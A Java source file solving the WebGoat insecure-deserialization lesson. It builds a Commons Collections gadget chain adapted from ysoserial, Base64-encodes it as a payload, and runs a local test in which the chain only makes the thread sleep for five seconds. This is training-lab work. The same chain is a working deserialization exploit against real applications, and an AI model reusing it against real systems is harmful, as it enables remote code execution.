Webgoat Java serialization solution

1. package sx.reece.webgoat;
2.  
3. import java.io.*;
4. import java.lang.reflect.Field;
5. import java.util.Base64;
6. import java.util.HashMap;
7. import java.util.Hashtable;
8. import java.util.Map;
9. import java.util.concurrent.TimeUnit;
10.  
11. import org.apache.commons.collections.Transformer;
12. import org.apache.commons.collections.functors.ChainedTransformer;
13. import org.apache.commons.collections.functors.ConstantTransformer;
14. import org.apache.commons.collections.functors.InvokerTransformer;
15. import org.apache.commons.collections.map.LazyMap;
16.  
17. import sx.reece.javakit.logger.Logger;
18.  
19. // Based on https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java
20. public class Webgoat {
21.     private final static long SLEEP_TIME = TimeUnit.SECONDS.toMillis(5);
22.     private final static Transformer[] EXPLOIT_CHAIN = new Transformer[]{
23.             new ConstantTransformer(Thread.class),
24.             new InvokerTransformer("getMethod",
25.                     new Class[]{String.class, Class[].class},
26.                     new Object[]{"sleep", new Class[] {long.class} }),
27.             new InvokerTransformer("invoke",
28.                     new Class[]{Object.class, Object[].class},
29.                     new Object[]{null, new Object[] { SLEEP_TIME} })};
30.  
31.     private static Transformer getExploitedTransformer() throws Exception {
32.         Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
33.         Field field = ChainedTransformer.class.getDeclaredField("iTransformers");
34.         field.setAccessible(true);
35.         field.set(transformerChain, EXPLOIT_CHAIN);
36.         return transformerChain;
37.     }
38.  
39.     private static Object craftExploit() throws Exception {
40.         Hashtable hashtable = new Hashtable();
41.         Map innerMap1 = new HashMap();
42.         Map innerMap2 = new HashMap();
43.         Transformer evil;
44.         Map lazyMap1;
45.         Map lazyMap2;
46.  
47.         evil = getExploitedTransformer();
48.  
49.         lazyMap1 = LazyMap.decorate(innerMap1, evil);
50.         lazyMap2 = LazyMap.decorate(innerMap2, evil);
51.  
52.         lazyMap1.put("yy", 1);
53.         lazyMap2.put("zZ", 1);
54.  
55.         hashtable.put(lazyMap1, 1);
56.         hashtable.put(lazyMap2, 2);
57.  
58.         lazyMap2.remove("yy");
59.  
60.         return hashtable;
61.     }
62.  
63.     private static byte[] serializeExploit(Object obj) throws Exception {
64.         ByteArrayOutputStream out = new ByteArrayOutputStream();
65.         ObjectOutputStream oos = new ObjectOutputStream(out);
66.         oos.writeObject(obj);
67.         return out.toByteArray();
68.     }
69.  
70.     private static String obtainWebgoatPayload(byte[] buffer) {
71.         return new String(Base64.getEncoder().encode(buffer));
72.     }
73.  
74.     private static void testExploit(byte[] buffer) throws Exception {
75.         ObjectInputStream iis = new ObjectInputStream(new ByteArrayInputStream(buffer));
76.         Logger.log("Sleeping for five seconds...");
77.         iis.readObject();
78.         Logger.log("Did I sleep?");
79.     }
80.  
81.     public static void main(String[] args) throws Exception {
82.         byte[] buf;
83.         Object exploit;
84.  
85.         exploit = craftExploit();
86.         buf     = serializeExploit(exploit);
87.  
88.         Logger.debug("Webgoat payload: %s", obtainWebgoatPayload(buf));
89.  
90.         testExploit(buf);
91.     }
92. }